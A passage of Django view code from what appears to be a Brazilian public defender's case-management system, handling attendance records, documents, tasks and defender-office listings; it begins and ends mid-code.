parte['atendimento__defensor__parte__processo__vara__nome'],\r\n 'processo_area': parte['atendimento__defensor__parte__processo__area__nome'],\r\n 'processo_tipo': processo_tipo,\r\n 'processo_data_cadastro': parte['atendimento__defensor__parte__data_cadastro'],\r\n 'requerente': None,\r\n 'requerido': None\r\n })\r\n\r\n if parte['atendimento__partes__tipo'] == 0:\r\n atendimentos[-1]['requerente'] = parte['atendimento__partes__pessoa__nome']\r\n else:\r\n atendimentos[-1]['requerido'] = parte['atendimento__partes__pessoa__nome']\r\n\r\n atendimentos_processo = atendimentos\r\n\r\n modo_exibicao = config.MODO_EXIBICAO_LISTA_DE_ATENDIMENTOS_DO_ASSISTIDO.lower()\r\n exibicao = modo_exibicao.replace(\" \", \"\").split(',')\r\n\r\n if request.GET.get('ligacao_numero'):\r\n url_agendamento_inicial = reverse('qualificacao_index', args=[request.GET.get('ligacao_numero')])\r\n else:\r\n url_agendamento_inicial = reverse('qualificacao_index')\r\n\r\n url_agendamento_inicial = '{}?next={}'.format(url_agendamento_inicial, request.session.get('next', ''))\r\n\r\n # if not atendimentos_como_requerente and \\\r\n # not atendimentos_como_requerido and \\\r\n # not atendimentos_processo and \\\r\n # not atendimentos_excluidos:\r\n # return redirect(url_agendamento_inicial)\r\n # else:\r\n angular = 'AtendimentosPessoaCtrl'\r\n return render(request=request, template_name=\"atendimento/atendimentos.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef listar_comunidade(request, atendimento_numero):\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n try:\r\n comunidade = Coletivo.objects.get(atendimento=atendimento.at_inicial).comunidade.to_dict()\r\n except ObjectDoesNotExist:\r\n comunidade = None\r\n\r\n return JsonResponse({'success': (comunidade is not None), 'comunidade': comunidade})\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef listar_documento(request, atendimento_numero=None):\r\n if atendimento_numero:\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n partes = atendimento.processo_partes.values_list('id', flat=True)\r\n\r\n manifestacoes = Manifestacao.objects.ativos().select_related(\r\n 'parte__processo'\r\n ).prefetch_related(\r\n Prefetch(\r\n 'documentos',\r\n queryset=ManifestacaoDocumento.objects.ativos().filter(\r\n manifestacao__parte__in=partes\r\n )\r\n )\r\n ).filter(\r\n parte__in=partes\r\n ).order_by(\r\n '-situacao',\r\n '-respondido_em',\r\n )\r\n\r\n manifestacoes = [{\r\n 'id': manifestacao.id,\r\n 'situacao': manifestacao.situacao,\r\n 'respondido_em': manifestacao.respondido_em,\r\n 'processo': {\r\n 'numero': manifestacao.parte.processo.numero if not manifestacao.parte.processo.pre_cadastro else None\r\n },\r\n 'documentos': [{\r\n 'id': documento.id,\r\n 'origem': documento.origem,\r\n 'origem_id': documento.origem_id\r\n } for documento in manifestacao.documentos.ativos()]\r\n } for manifestacao in manifestacoes]\r\n\r\n # Identifica se o documento está vinculado à uma solicitação de Diligência\r\n subquery_diligencia = AtendimentoDefensor.objects.filter(\r\n Q(nucleo__diligencia=True) &\r\n Q(filhos__data_atendimento=None) &\r\n Q(filhos__ativo=True) &\r\n (\r\n (\r\n Q(documento__documento_online__isnull=False) &\r\n Q(documento__documento_online=OuterRef('documento_online_id'))\r\n ) |\r\n (\r\n Q(documento__documento_online__isnull=True) &\r\n Q(documento__arquivo=OuterRef('arquivo'))\r\n )\r\n )\r\n ).values('id')[:1]\r\n\r\n uploads = atendimento.documentos.select_related('pasta').filter(\r\n # documento_online=None\r\n origem_resposta=None\r\n ).annotate(\r\n pk=F('id'),\r\n documento_online_assunto=F('documento_online__assunto'),\r\n # titulo=F('documento_online__titulo'),\r\n documento_online_pk_uuid=F('documento_online__pk_uuid'),\r\n documento_online_versao=F('documento_online__versao_numero'),\r\n documento_online_criado_em=F('documento_online__criado_em'),\r\n documento_online_criado_por_nome_servidor=F('documento_online__criado_por__servidor__nome'),\r\n documento_online_modificado_em=F('documento_online__modificado_em'),\r\n documento_online_modificado_por_nome_servidor=F('documento_online__modificado_por__servidor__nome'),\r\n # TODO: renomear field data_assinado para \"assinado_em\" ou \"finalizado_em\"\r\n documento_online_assinado_em=F('documento_online__data_assinado'),\r\n # TODO: remover assinado por e incluir assinantes\r\n # documento_online_assinado_por_nome_servidor=F('documento_online__assinado_por__servidor__nome'),\r\n # documento_online_assinado_por_pk=F('documento_online__assinado_por__pk'),\r\n documento_online_esta_assinado=F('documento_online__esta_assinado'),\r\n cadastrado_por_nome=F('cadastrado_por__nome'),\r\n cadastrado_por_username=F('cadastrado_por__usuario__username'),\r\n enviado_por_nome=F('enviado_por__nome'),\r\n enviado_por_username=F('enviado_por__usuario__username'),\r\n pendente=Case(When(arquivo=\"\", documento_online=None, then=Value(True)), default=Value(False),\r\n output_field=BooleanField()),\r\n documento_resposta_nome=F('documento_resposta__nome'),\r\n documento_resposta_arquivo=F('documento_resposta__arquivo'),\r\n documento_resposta_data_enviado=F('documento_resposta__data_enviado'),\r\n documento_resposta_enviado_por_nome=F('documento_resposta__enviado_por__nome'),\r\n documento_resposta_enviado_por_username=F('documento_resposta__enviado_por__usuario__username'),\r\n pasta_nome=F(\"pasta__nome\"),\r\n pasta_descricao=F(\"pasta__descricao\"),\r\n diligencia=Exists(Subquery(subquery_diligencia, output_field=BooleanField()))\r\n ).order_by('-pendente', 'data_cadastro').values()\r\n\r\n for upload in uploads:\r\n\r\n if upload.get('arquivo'):\r\n documento_url = AtendimentoDocumento.objects.get(id=upload.get('pk')).arquivo.url\r\n # identifica tipo do arquivo\r\n filetype, encoding = mimetypes.guess_type(upload['arquivo'], strict=True)\r\n upload['filetype'] = filetype\r\n # completa URL do arquivo\r\n upload['arquivo'] = documento_url\r\n\r\n # Variável para controle se o documento ged pode ser baixado (padrão: False)\r\n upload['documento_online_pode_baixar'] = False\r\n upload['defensoria_nome'] = atendimento.defensoria.nome\r\n\r\n # Tratamentos para GED\r\n if upload['documento_online_id']:\r\n # Faz tratamento para habilitar os botões GED\r\n ged = DocumentoGED.objects.get(id=upload['documento_online_id'])\r\n\r\n pode_visualizar = SolarDefensoriaBackend().pode_visualizar(\r\n document=ged,\r\n usuario=request.user)\r\n upload['documento_online_pode_visualizar'] = pode_visualizar\r\n\r\n pode_editar = SolarDefensoriaBackend().pode_editar(\r\n document=ged,\r\n usuario=request.user)\r\n upload['documento_online_pode_editar'] = pode_editar[0]\r\n upload['documento_online_pode_editar_msg'] = pode_editar[1]\r\n\r\n pode_excluir = SolarDefensoriaBackend().pode_excluir_documento(\r\n document=ged,\r\n usuario=request.user)\r\n upload['documento_online_pode_excluir'] = pode_excluir[0]\r\n upload['documento_online_pode_excluir_msg'] = pode_excluir[1]\r\n\r\n pode_revogar_assinatura = SolarDefensoriaBackend().pode_revogar_assinatura(\r\n document=ged,\r\n usuario=request.user)\r\n upload['documento_online_pode_revogar_assinatura'] = pode_revogar_assinatura[0]\r\n upload['documento_online_pode_revogar_assinatura_msg'] = pode_revogar_assinatura[1]\r\n\r\n # Só pode baixar documento assinado ou com a configuração para baixar não assinados habilitada\r\n if upload['documento_online_esta_assinado'] or config.GED_PODE_BAIXAR_DOCUMENTO_NAO_ASSINADO:\r\n upload['documento_online_pode_baixar'] = True\r\n\r\n if upload['prazo_resposta']:\r\n upload['prazo_resposta_dias'] = (upload['prazo_resposta'].date() - date.today()).days\r\n if not upload['status_resposta'] is None:\r\n upload['status_resposta_str'] = AtendimentoDocumento.LISTA_STATUS_RESPOSTA[upload['status_resposta']][1]\r\n\r\n # completa URL do arquivo\r\n if upload['documento_resposta_arquivo']:\r\n upload['documento_resposta_arquivo'] = AtendimentoDocumento.objects.get(id=upload.get('documento_resposta_id')).arquivo.url # noqa: E501\r\n\r\n # Verifica em quais manifestações o documento está vinculado\r\n upload['manifestacoes'] = []\r\n for manifestacao in manifestacoes:\r\n for doc in manifestacao['documentos']:\r\n if doc['origem'] == ManifestacaoDocumento.ORIGEM_ATENDIMENTO and doc['origem_id'] == upload['pk']:\r\n upload['manifestacoes'].append(manifestacao['id'])\r\n\r\n if len(upload['manifestacoes']) == 0:\r\n upload['manifestacoes'] = None\r\n\r\n upload['pasta'] = {\r\n \"id\": upload[\"pasta_id\"],\r\n \"nome\": upload[\"pasta_nome\"],\r\n \"descricao\": upload[\"pasta_descricao\"]\r\n }\r\n\r\n assistidos = AtendimentoPessoa.objects.filter(\r\n atendimento=atendimento.at_inicial,\r\n ativo=True,\r\n ).annotate(\r\n pessoa_nome=Case(\r\n When(pessoa__declara_identidade_genero=True, then=F('pessoa__nome_social')),\r\n default=F('pessoa__nome')\r\n ),\r\n ).values()\r\n\r\n assistidos_documentos = AtendimentoPessoa.objects.filter(\r\n pessoa__documentos__ativo=True,\r\n atendimento=atendimento.at_inicial,\r\n ativo=True,\r\n ).annotate(\r\n pk=F('pessoa__documentos__id'),\r\n arquivo=F('pessoa__documentos__arquivo'),\r\n documento_pk=F('pessoa__documentos__id'),\r\n nome=F('pessoa__documentos__nome'),\r\n data_enviado=F('pessoa__documentos__data_enviado'),\r\n enviado_por_nome=F('pessoa__documentos__enviado_por__nome'),\r\n enviado_por_username=F('pessoa__documentos__enviado_por__usuario__username'),\r\n ).values(\r\n 'pk',\r\n 'documento_pk',\r\n 'pessoa_id',\r\n 'arquivo',\r\n 'nome',\r\n 'data_enviado',\r\n 'enviado_por_nome',\r\n 'enviado_por_username'\r\n )\r\n\r\n for documento in assistidos_documentos:\r\n # completa URL do arquivo\r\n if documento.get('arquivo'):\r\n documento_url = DocumentoAssistido.objects.get(id=documento.get('documento_pk')).arquivo.url\r\n documento['arquivo'] = documento_url\r\n documento['pendente'] = False\r\n\r\n # Verifica em quais manifestações o documento está vinculado\r\n documento['manifestacoes'] = []\r\n for manifestacao in manifestacoes:\r\n for doc in manifestacao['documentos']:\r\n if doc['origem'] == ManifestacaoDocumento.ORIGEM_PESSOA and doc['origem_id'] == documento['pk']:\r\n documento['manifestacoes'].append(manifestacao['id'])\r\n\r\n if len(documento['manifestacoes']) == 0:\r\n documento['manifestacoes'] = None\r\n\r\n atendimento_url = reverse('atendimento_atender', args=[atendimento_numero, ])\r\n\r\n return JsonResponse({\r\n 'uploads': list(uploads),\r\n 'assistidos': list(assistidos),\r\n 'assistidos_documentos': list(assistidos_documentos),\r\n 'atendimento_url': atendimento_url,\r\n 'atendimento_numero': atendimento_numero,\r\n 'manifestacoes': manifestacoes\r\n }, safe=False)\r\n\r\n else:\r\n\r\n arr = []\r\n for i in Documento.objects.all():\r\n arr.append(i.nome)\r\n\r\n return JsonResponse(arr, safe=False)\r\n\r\n\r\n@login_required\r\ndef listar_formulario(request, atendimento_numero):\r\n\r\n formularios = []\r\n\r\n try:\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n except ObjectDoesNotExist:\r\n return JsonResponse({'success': False, 'formularios': formularios})\r\n\r\n if atendimento.nucleo:\r\n nucleo = atendimento.nucleo\r\n elif atendimento.defensoria and atendimento.defensoria.nucleo:\r\n nucleo = atendimento.defensoria.nucleo\r\n else:\r\n nucleo = None\r\n\r\n formularios_lst = FormularioNucleo.objects.ativos().filter(\r\n Q(exibir_em_atendimento=True) &\r\n (\r\n Q(nucleo_id=nucleo) |\r\n Q(publico=True)\r\n )\r\n )\r\n\r\n for formulario in formularios_lst:\r\n\r\n item = {\r\n 'id': formulario.id,\r\n 'texto': formulario.texto,\r\n 'perguntas': []\r\n }\r\n\r\n for pergunta in formulario.perguntas:\r\n item['perguntas'].append({\r\n 'id': pergunta.id,\r\n 'texto': pergunta.texto,\r\n 'tipo': pergunta.tipo,\r\n 'alternativas': pergunta.alternativas,\r\n 'resposta': None\r\n })\r\n\r\n respostas = RespostaNucleo.objects.filter(\r\n atendimento=atendimento.at_inicial,\r\n pergunta__formulario=formulario\r\n )\r\n\r\n for resposta in respostas:\r\n for pergunta in item['perguntas']:\r\n if pergunta['id'] == resposta.pergunta_id:\r\n pergunta['resposta'] = resposta.texto\r\n\r\n formularios.append(item)\r\n\r\n return JsonResponse({'success': True, 'formularios': formularios})\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef listar_defensorias(request, atendimento_numero=None):\r\n\r\n atendimento = AtendimentoDefensor.objects.get(numero=atendimento_numero)\r\n\r\n # Recupera todos atendimentos vinculados ao inicial\r\n atendimentos = AtendimentoDefensor.objects.filter(\r\n Q(inicial=atendimento.at_inicial.id) &\r\n Q(tipo__in=[\r\n Atendimento.TIPO_INICIAL,\r\n Atendimento.TIPO_RETORNO,\r\n Atendimento.TIPO_NUCLEO,\r\n Atendimento.TIPO_VISITA,\r\n Atendimento.TIPO_ENCAMINHAMENTO,\r\n Atendimento.TIPO_ANOTACAO\r\n ]) &\r\n Q(remarcado=None) &\r\n Q(ativo=True)\r\n ).values_list('id', flat=True)\r\n\r\n # Gera lista dos ids dos atendimentos (inicial + retornos)\r\n atendimentos = [atendimento.at_inicial.id] + list(atendimentos)\r\n\r\n # Recupera lista de defensorias dos atendimentos\r\n defensorias_atendimentos = AtendimentoDefensor.objects.filter(\r\n id__in=atendimentos\r\n ).order_by('defensoria_id').distinct().values_list('defensoria_id', flat=True)\r\n\r\n # Recupera lista de defensorias das partes de processos\r\n defensorias_processos = ParteProcesso.objects.filter(\r\n atendimento__in=atendimentos\r\n ).order_by('defensoria_id').distinct().values_list('defensoria_id', flat=True)\r\n\r\n # Unifica lista de defensorias participantes (via atendimentos ou processos)\r\n defensorias_participantes = set(list(defensorias_atendimentos) + list(defensorias_processos))\r\n\r\n # Recupera dados das defensorias participantes ou que podem vincular tarefa de cooperacao\r\n defensorias = list(Defensoria.objects.filter(\r\n Q(id__in=defensorias_participantes) |\r\n Q(pode_vincular_tarefa_de_cooperacao=True)\r\n ).values(\r\n 'id',\r\n 'nome',\r\n 'atuacao',\r\n 'nucleo__multidisciplinar',\r\n 'nucleo__diligencia',\r\n 'nucleo__indeferimento',\r\n 'nucleo__agendamento',\r\n ))\r\n\r\n # Marca quais das defensorias participam do atendimento/processo\r\n for defensoria in defensorias:\r\n\r\n if defensoria['id'] in defensorias_participantes:\r\n defensoria['participante'] = True\r\n else:\r\n defensoria['participante'] = False\r\n\r\n # Só permite o cadastro de tarefas para setores com acesso ao Painel do Defensor (ver nucleo.views.index)\r\n defensoria['pode_cadastrar_tarefa'] = True\r\n nucleo_multidisciplinar = defensoria.pop('nucleo__multidisciplinar')\r\n nucleo_diligencia = defensoria.pop('nucleo__diligencia')\r\n nucleo_indeferimento = defensoria.pop('nucleo__indeferimento')\r\n nucleo_agendamento = defensoria.pop('nucleo__agendamento')\r\n\r\n if nucleo_multidisciplinar:\r\n defensoria['pode_cadastrar_tarefa'] = False\r\n elif nucleo_diligencia:\r\n defensoria['pode_cadastrar_tarefa'] = False\r\n elif nucleo_indeferimento and not nucleo_agendamento:\r\n defensoria['pode_cadastrar_tarefa'] = False\r\n\r\n data_base = datetime.today()\r\n\r\n resposta_para = []\r\n\r\n if hasattr(request.user.servidor, 'defensor'):\r\n defensor = request.user.servidor.defensor\r\n\r\n atuacoes = Atuacao.objects.vigentes_por_defensor(\r\n defensor=defensor,\r\n inicio=data_base\r\n ).values(\r\n 'defensoria_id',\r\n 'defensoria__nome',\r\n 'defensoria__nucleo__multidisciplinar',\r\n 'defensoria__nucleo__diligencia',\r\n 'defensoria__nucleo__indeferimento',\r\n 'defensoria__nucleo__agendamento',\r\n )\r\n\r\n for atuacao in atuacoes:\r\n\r\n # Só permite o cadastro de tarefas para setores com acesso ao Painel do Defensor (ver nucleo.views.index)\r\n pode_cadastrar_tarefa = True\r\n nucleo_multidisciplinar = atuacao.pop('defensoria__nucleo__multidisciplinar')\r\n nucleo_diligencia = atuacao.pop('defensoria__nucleo__diligencia')\r\n nucleo_indeferimento = atuacao.pop('defensoria__nucleo__indeferimento')\r\n nucleo_agendamento = atuacao.pop('defensoria__nucleo__agendamento')\r\n\r\n if nucleo_multidisciplinar:\r\n pode_cadastrar_tarefa = False\r\n elif nucleo_diligencia:\r\n pode_cadastrar_tarefa = False\r\n elif nucleo_indeferimento and not nucleo_agendamento:\r\n pode_cadastrar_tarefa = False\r\n\r\n resposta_para.append({\r\n 'id': atuacao['defensoria_id'],\r\n 'nome': atuacao['defensoria__nome'],\r\n 'pode_cadastrar_tarefa': pode_cadastrar_tarefa,\r\n })\r\n\r\n return JsonResponse({\r\n 'defensorias': defensorias,\r\n 'resposta_para': resposta_para\r\n })\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef listar_tipos_tarefas(request, atendimento_numero=None):\r\n from atendimento.atendimento.models import Qualificacao\r\n tipos_tarefas = list(Qualificacao.objects.filter(tipo=40).values('id', 'titulo'))\r\n return JsonResponse({\r\n 'tipos_tarefas': tipos_tarefas\r\n })\r\n\r\n\r\n@login_required\r\ndef perfil(request, comarca_id=None):\r\n if hasattr(request.user.servidor, 'defensor'):\r\n data_base = datetime.now()\r\n servidor = request.user.servidor\r\n defensor = request.user.servidor.defensor\r\n\r\n AtuacaoClass = Atuacao\r\n atuacoes_lst = defensor.atuacoes().filter(\r\n defensoria__evento=None\r\n )\r\n\r\n atuacoes_ativas = atuacoes_lst.vigentes()\r\n\r\n atuacoes_futuras = atuacoes_lst.filter(\r\n Q(data_inicial__gt=data_base)\r\n )\r\n\r\n comarcas = atuacoes_ativas.filter(\r\n defensoria__nucleo=None\r\n ).distinct(\r\n 'defensoria__comarca_id',\r\n 'defensoria__comarca__nome'\r\n ).order_by(\r\n 'defensoria__comarca__nome'\r\n ).values_list(\r\n 'defensoria__comarca_id',\r\n 'defensoria__comarca__nome'\r\n )\r\n\r\n nucleos = Atuacao.objects.filter(\r\n Q(defensor=defensor) &\r\n ~Q(defensoria__nucleo=None) &\r\n (\r\n (\r\n (\r\n Q(data_inicial__lte=data_base) &\r\n Q(data_final=None)\r\n ) |\r\n (\r\n Q(data_inicial__lte=data_base) &\r\n Q(data_final__gte=data_base)\r\n )\r\n ) |\r\n (\r\n Q(defensoria__evento__participantes=servidor) &\r\n Q(defensoria__evento__data_inicial__lte=datetime.now()) &\r\n Q(defensoria__evento__data_final__gte=datetime.now() - timedelta(days=5)) &\r\n Q(defensoria__evento__ativo=True)\r\n )\r\n )\r\n ).distinct(\r\n 'defensoria__nucleo_id',\r\n 'defensoria__nucleo__nome',\r\n 'defensoria__nucleo__plantao'\r\n ).order_by(\r\n 'defensoria__nucleo__nome'\r\n ).values_list(\r\n 'defensoria__nucleo_id',\r\n 'defensoria__nucleo__nome',\r\n 'defensoria__nucleo__plantao',\r\n 'defensoria__nucleo__diligencia',\r\n )\r\n\r\n # Verifica se usário está lotado em alguma defensoria com o recurso peticionamento habilitado\r\n pode_cadastrar_peticionamento = atuacoes_ativas.filter(\r\n defensoria__pode_cadastrar_peticionamento=True\r\n ).exists()\r\n\r\n total_peticionamentos = Manifestacao.objects.ativos().filter(\r\n situacao__in=[Manifestacao.SITUACAO_ANALISE, Manifestacao.SITUACAO_ERRO],\r\n defensoria__in=atuacoes_ativas.values('defensoria')\r\n ).count()\r\n\r\n total_avisos = 0\r\n\r\n # Se pode cadastrar peticionamentos e procapi está ativo, permite visualizar avisos\r\n if pode_cadastrar_peticionamento and config.ATIVAR_PROCAPI:\r\n\r\n # Só consulta se credenciais foram identificadas ou é um superusuário\r\n if defensor.eh_defensor or request.user.is_superuser:\r\n # Consulta no ProcAPI o total de avisos pendentes\r\n api = APIAviso()\r\n total_avisos = api.consultar_total_abertos(params={\r\n 'distribuido_cpf': defensor.servidor.cpf if not request.user.is_superuser else None,\r\n 'ativo': True\r\n })\r\n\r\n # Se pode processos e procapi está ativo, permite visualizar avisos\r\n if request.user.has_perm('processo.view_distribuicao') and config.ATIVAR_PROCAPI:\r\n\r\n total_processos_para_distribuir = 0\r\n\r\n api = APIAviso()\r\n # Consulta no ProcAPI a lista de avisos pendentes\r\n total_processos_para_distribuir = api.consultar_total(params={\r\n 'distribuido': False,\r\n 'ativo': True,\r\n })\r\n\r\n request.session['nucleo'] = None\r\n request.session['comarca'] = servidor.comarca.id\r\n\r\n return render(request=request, template_name=\"atendimento/perfil.html\", context=locals())\r\n\r\n\r\n@login_required\r\ndef responder_nucleo(request, atendimento_numero):\r\n pass\r\n\r\n\r\n@login_required\r\ndef responder_tarefa(request, atendimento_numero):\r\n if request.method == 'POST':\r\n\r\n servidor = Servidor.objects.get(usuario_id=request.user.id)\r\n tarefa = Tarefa.objects.get(id=request.POST.get('tarefa'))\r\n documento = None\r\n\r\n if request.FILES:\r\n\r\n salvou, documento = salvar_documento_pre(request, atendimento_numero)\r\n\r\n if not salvou:\r\n for k, v in documento.items():\r\n messages.error(request, '{0}: {1}'.format(k, v))\r\n return redirect(request.POST['next'])\r\n\r\n resposta = tarefa.responder(request.POST.get('resposta'), servidor, int(request.POST.get('status')))\r\n\r\n if documento:\r\n resposta.documento = documento\r\n resposta.save()\r\n\r\n if request.POST.get('documento_ged'):\r\n resposta.documentos.add(request.POST.get('documento_ged'))\r\n\r\n if tarefa.status != resposta.status:\r\n tarefa.status = resposta.status\r\n tarefa.save()\r\n\r\n messages.success(request, 'Resposta à tarefa registrada com sucesso!')\r\n\r\n return redirect(request.POST['next'])\r\n\r\n raise Http404\r\n\r\n\r\n@login_required\r\n@transaction.atomic\r\ndef salvar(request, atendimento_numero):\r\n \"\"\"Utilizado para salvar o atendimento na página Ficha de Atendimento Histórico\"\"\"\r\n\r\n success = False\r\n errors = None\r\n recarregar_pagina = False\r\n\r\n if request.method == 'POST':\r\n\r\n atendimento = AtendimentoDefensor.objects.filter(numero=atendimento_numero, ativo=True, remarcado=None).first()\r\n\r\n if (atendimento and\r\n (not atendimento.realizado or\r\n atendimento.agendado_hoje or\r\n atendimento.realizado_hoje or\r\n atendimento.pode_atender_retroativo(request.user))):\r\n\r\n data_atendimento_original = atendimento.data_atendimento\r\n form = AtendimentoDefensorForm(request.POST, instance=atendimento)\r\n\r\n if form.is_valid():\r\n\r\n atendimento = form.save(commit=False)\r\n atendimento.modificado_por = request.user.servidor\r\n\r\n servidor = request.user.servidor\r\n defensor = servidor.defensor\r\n\r\n if not atendimento.atendido_por:\r\n atendimento.atendido_por = servidor\r\n\r\n # Corrige vínculo do defensor com o atendimento\r\n if defensor.eh_defensor and defensor not in [atendimento.defensor, atendimento.substituto]:\r\n\r\n atuacao = defensor.all_atuacoes.vigentes(\r\n ajustar_horario=False\r\n ).filter(\r\n defensoria=atendimento.defensoria\r\n ).first()\r\n\r\n if atuacao is None:\r\n logger.warning('O defensor {} não está lotado na defensoria {}'.format(defensor, atendimento.defensoria)) # noqa: E501\r\n elif atuacao.tipo == Atuacao.TIPO_SUBSTITUICAO:\r\n atendimento.defensor = atuacao.titular\r\n atendimento.substituto = atuacao.defensor\r\n elif atuacao:\r\n atendimento.defensor = atuacao.defensor\r\n\r\n if atendimento.data_atendimento.date() == date.today():\r\n if data_atendimento_original:\r\n atendimento.data_atendimento = data_atendimento_original\r\n else:\r\n atendimento.data_atendimento = datetime.now()\r\n\r\n if request.POST.get('finalizado'):\r\n atendimento.finalizado_por = Defensor.objects.get(servidor__usuario=request.user)\r\n atendimento.data_finalizado = datetime.now()\r\n\r\n if request.POST.get('forma_atendimento'):\r\n atendimento.forma_atendimento_id = request.POST.get('forma_atendimento')\r\n else:\r\n atendimento.forma_atendimento_id = None\r\n\r\n if request.POST.get('tipo_coletividade'):\r\n atendimento.tipo_coletividade_id = request.POST.get('tipo_coletividade')\r\n else:\r\n atendimento.tipo_coletividade_id = None\r\n\r\n if request.POST.get('interesse_conciliacao'):\r\n atendimento.interesse_conciliacao = request.POST.get('interesse_conciliacao')\r\n else:\r\n atendimento.interesse_conciliacao = None\r\n\r\n if request.POST.get('justificativa_nao_interesse'):\r\n atendimento.justificativa_nao_interesse = request.POST.get('justificativa_nao_interesse')\r\n else:\r\n atendimento.justificativa_nao_interesse = None\r\n\r\n if request.POST.get('tipo'):\r\n atendimento.nucleo = Nucleo.objects.filter(acordo=True).first()\r\n\r\n if AtendimentoPreso.objects.filter(id=atendimento.id).exists():\r\n nadep = AtendimentoPreso.objects.get(id=atendimento.id)\r\n nadep.__dict__.update(atendimento.__dict__)\r\n atendimento = nadep\r\n\r\n atualiza_tarefa_atendimento_origem(\r\n atendimento=atendimento,\r\n resposta=atendimento.historico,\r\n servidor=servidor,\r\n finalizar=True,\r\n reabrir=False\r\n )\r\n\r\n salvar_acordo_para_atendimento(request, atendimento)\r\n\r\n atendimento.save()\r\n\r\n # Muda status publico/privado do atendimento\r\n if request.POST.get('publico'):\r\n if request.POST.get('publico') == 'true':\r\n Acesso.conceder_publico(atendimento, request.user.servidor.defensor)\r\n else:\r\n Acesso.revogar_publico(atendimento, request.user.servidor.defensor)\r\n\r\n # Salvar indeferimento por negação para cada pessoa marcada\r\n if request.POST.get('indeferimento_classe'):\r\n\r\n success = True\r\n\r\n # recarregar página ao Salvar o Indeferimento\r\n if request.POST.getlist('indeferimento_pessoa'):\r\n recarregar_pagina = True\r\n\r\n for pessoa in request.POST.getlist('indeferimento_pessoa'):\r\n try:\r\n Indeferimento.objects.get_or_create_atendimento_pessoa(\r\n atendimento=atendimento,\r\n atuacao_id=None,\r\n pessoa_id=pessoa,\r\n classe_id=request.POST.get('indeferimento_classe'),\r\n setor_encaminhado_id=request.POST.get('indeferimento_setor_encaminhado'),\r\n )\r\n except Exception as e:\r\n errors = {\r\n 'field': 'Indeferimento',\r\n 'message': str(e)\r\n }\r\n success = False\r\n recarregar_pagina = False\r\n break\r\n else:\r\n success = True\r\n else:\r\n success = True\r\n\r\n else:\r\n\r\n errors = [({'field': k, 'message': v[0]}) for k, v in form.errors.items()]\r\n\r\n return JsonResponse({\r\n 'success': success,\r\n 'errors': errors,\r\n 'recarregar_pagina': recarregar_pagina\r\n })\r\n\r\n\r\ndef salvar_acordo_para_atendimento(request, atendimento):\r\n\r\n if request.POST.get('acordo') and (atendimento.nucleo or atendimento.defensoria.nucleo):\r\n\r\n acordo, novo = Acordo.objects.update_or_create(\r\n atendimento=atendimento,\r\n defaults={\r\n 'tipo': int(request.POST.get('acordo')),\r\n 'ativo': True\r\n }\r\n )\r\n\r\n if request.FILES:\r\n\r\n if acordo.termo:\r\n documento = acordo.termo\r\n else:\r\n documento = AtendimentoDocumento(\r\n atendimento=atendimento.at_inicial,\r\n cadastrado_por=request.user.servidor)\r\n\r\n documento.data_enviado = datetime.now()\r\n documento.enviado_por = request.user.servidor\r\n\r\n form = DocumentoForm(request.POST, request.FILES, instance=documento)\r\n\r\n if form.is_valid():\r\n acordo.termo = form.save()\r\n acordo.save()\r\n\r\n # Remove dados de atendimento se ambas as partes não compareceram\r\n if acordo.tipo == Acordo.TIPO_AMBOS and not config.CONTABILIZAR_ACORDO_TIPO_AMBOS:\r\n atendimento.atendido_por = None\r\n atendimento.data_atendimento = None\r\n\r\n else:\r\n\r\n if hasattr(atendimento, 'acordo'):\r\n atendimento.acordo.ativo = False\r\n atendimento.acordo.save()\r\n\r\n\r\n@login_required\r\ndef finalizar(request, atendimento_numero):\r\n atendimento = AtendimentoDefensor.objects.filter(numero=atendimento_numero, ativo=True, remarcado=None).first()\r\n data_atendimento_original = atendimento.data_atendimento\r\n\r\n if atendimento.data_atendimento:\r\n if atendimento.data_atendimento.date() == date.today():\r\n if data_atendimento_original:\r\n atendimento.data_atendimento = data_atendimento_original\r\n else:\r\n atendimento.data_atendimento = datetime.now()\r\n else:\r\n atendimento.data_atendimento = datetime.now()\r\n\r\n atendimento.save()\r\n\r\n messages.success(request, 'Atendimento finalizado com sucesso!')\r\n return redirect('atendimento_index')\r\n\r\n\r\nclass AnotacaoCreateView(CreateView):\r\n form_class = AnotacaoForm\r\n model = AtendimentoDefensor\r\n template_name = \"atendimento/atender_modal_anotacao_form.html\"\r\n\r\n # variáveis para uso em heranças\r\n atendimento = None\r\n atendimento_tipo = Atendimento.TIPO_ANOTACAO\r\n\r\n def get_context_data(self, **kwargs):\r\n\r\n context = super(AnotacaoCreateView, self).get_context_data(**kwargs)\r\n context['form_name'] = 'AnotacaoForm'\r\n\r\n # carrega dados do atendimento em que a anotação será vinculada\r\n if self.kwargs['atendimento_numero']:\r\n self.atendimento = AtendimentoDefensor.objects.get(\r\n numero=self.kwargs['atendimento_numero'],\r\n ativo=True\r\n )\r\n context['atendimento'] = self.atendimento\r\n\r\n return context\r\n\r\n def form_invalid(self, form):\r\n\r\n mensagem = \"Erro ao salvar! Por favor, tente novamente.\"\r\n\r\n if self.request.is_ajax():\r\n return JsonResponse({'success': False, 'message': mensagem, 'errors': form.errors})\r\n else:\r\n messages.error(self.request, mensagem)\r\n return HttpResponseRedirect(self.request.META.get('HTTP_REFERER', '/'))\r\n\r\n def form_valid(self, form):\r\n\r\n anotacao = form.save(commit=False)\r\n atendimento = AtendimentoDefensor.objects.only('id', 'inicial_id').get(numero=self.kwargs['atendimento_numero'])\r\n\r\n # atualiza objeto com dados adicionais\r\n anotacao.origem = atendimento\r\n anotacao.inicial = atendimento.at_inicial\r\n anotacao.cadastrado_por = self.request.user.servidor\r\n anotacao.tipo = self.atendimento_tipo\r\n if not settings.SIGLA_UF.upper() == 'AM':\r\n qualificacao = form.cleaned_data['qualificacao']\r\n\r\n if (qualificacao.eh_qualificacao_sms and (not config.USAR_SMS or not config.SERVICO_SMS_DISPONIVEL)):\r\n mensagem = \"O envio de SMS está desabilitado no sistema!\"\r\n if self.request.is_ajax():\r\n return JsonResponse({'success': False, 'message': mensagem, 'anotacao': Util.object_to_dict(anotacao)}) # noqa: E501\r\n else:\r\n messages.error(self.request, mensagem)\r\n return HttpResponseRedirect(self.get_success_url())\r\n\r\n enviar_sms = 